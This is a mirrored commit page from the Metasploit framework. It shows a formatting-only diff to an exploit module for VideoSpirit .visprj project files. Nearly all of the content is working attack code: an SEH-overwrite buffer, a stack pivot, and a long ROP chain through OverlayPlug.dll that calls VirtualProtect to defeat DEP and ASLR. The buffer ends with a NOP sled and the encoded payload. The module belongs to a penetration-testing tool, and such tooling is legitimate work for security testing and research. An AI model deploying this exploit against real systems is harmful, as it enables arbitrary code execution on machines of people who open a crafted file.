infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Format issue fix 

git-svn-id: file:///home/svn/framework3/trunk@12299 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-04-11 22:28:38 +00:00
parent 36367f8a67
commit 300989db5f
1 changed files with 33 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
modules/exploits/windows/fileformat/videospirit_visprj.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Acidgen', #found the vulnerability 'Acidgen', #found the vulnerability
'corelanc0d3r', #rop exploit + msf module 'corelanc0d3r', #rop exploit + msf module
], ],
'Version' => '$Revision$', 'Version' => '$Revision$',
@ -113,26 +113,26 @@ class Metasploit3 < Msf::Exploit::Remote
# one non-ASLR module is enough for generic ASLR & DEP bypass ! # one non-ASLR module is enough for generic ASLR & DEP bypass !
# pvefindaddr rop 'n roll # pvefindaddr rop 'n roll
# First, grab VirtualProtect ptr # First, grab VirtualProtect ptr
0x10065292, # POP EAX # RETN [Module : OverlayPlug.dll] ** 0x10065292, # POP EAX # RETN [OverlayPlug.dll]
0x106F4244, # IAT entry + offsqet (bad char friendly) 0x106F4244, # IAT entry + offsqet (bad char friendly)
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** 0x10019762, # POP EBP # RETN [OverlayPlug.dll]
0xEFEFEFF0, # bye bye offset 0xEFEFEFF0, # bye bye offset
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [Module : OverlayPlug.dll] ** 0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : OverlayPlug.dll] ** 0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll]
0x10016A56, # XCHG EAX,ESI [Module : OverlayPlug.dll] ** 0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll]
# set size # set size
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** 0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :) 0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** 0x10019762, # POP EBP # RETN [OverlayPlug.dll]
0xEFEFEFF0, # boo 0xEFEFEFF0, # boo
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
0x10053E4C, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** 0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [Module : OverlayPlug.dll] ** 0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
@ -155,38 +155,38 @@ class Metasploit3 < Msf::Exploit::Remote
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
# set NewProtect to 0x40 # set NewProtect to 0x40
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [Module : OverlayPlug.dll] ** 0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [Module : OverlayPlug.dll] ** 0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
# write pOldProtect to .data section # write pOldProtect to .data section
0x1001AB51, # POP ECX # RETN [Module : OverlayPlug.dll] ** 0x1001AB51, # POP ECX # RETN [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10117030, # RW 0x10117030, # RW
# EDI : ROP NOP # EDI : ROP NOP
0x10057090, # POP EDI # RETN [Module : OverlayPlug.dll] ** 0x10057090, # POP EDI # RETN [OverlayPlug.dll]
0x10057091, # ROP NOP 0x10057091, # ROP NOP
# pReturn2Payload # pReturn2Payload
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [Module : OverlayPlug.dll] ** 0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll]
0x10016A56, # XCHG EAX,ESI # RETN [Module : OverlayPlug.dll] ** 0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll]
0x1003C946, # ADD EAX,0A # RETN [Module : OverlayPlug.dll] 0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll]
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
@ -206,23 +206,23 @@ class Metasploit3 < Msf::Exploit::Remote
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
0x1001FDBD, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** 0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** 0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
0x41414141, 0x41414141,
# go # go
0x10066F84, # PUSHAD # RETN [Module : OverlayPlug.dll] ** 0x10066F84, # PUSHAD # RETN [OverlayPlug.dll]
].pack("V*") ].pack("V*")
buffer = "<valitem name=" buffer = "<valitem name="
buffer << '"' buffer << '"'
buffer << rand_text_alphanumeric((target['OffSet'])) buffer << rand_text_alphanumeric((target['OffSet']))
buffer << rand_text_alphanumeric(4) #nseh buffer << rand_text_alphanumeric(4) #nseh
buffer << pivot buffer << pivot
buffer << rand_text_alphanumeric((target['OffSetToRop'])) buffer << rand_text_alphanumeric((target['OffSetToRop']))
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7 buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7
buffer << rop_gadgets buffer << rop_gadgets
buffer << "\x90" * 150 buffer << "\x90" * 150
buffer << payload.encoded buffer << payload.encoded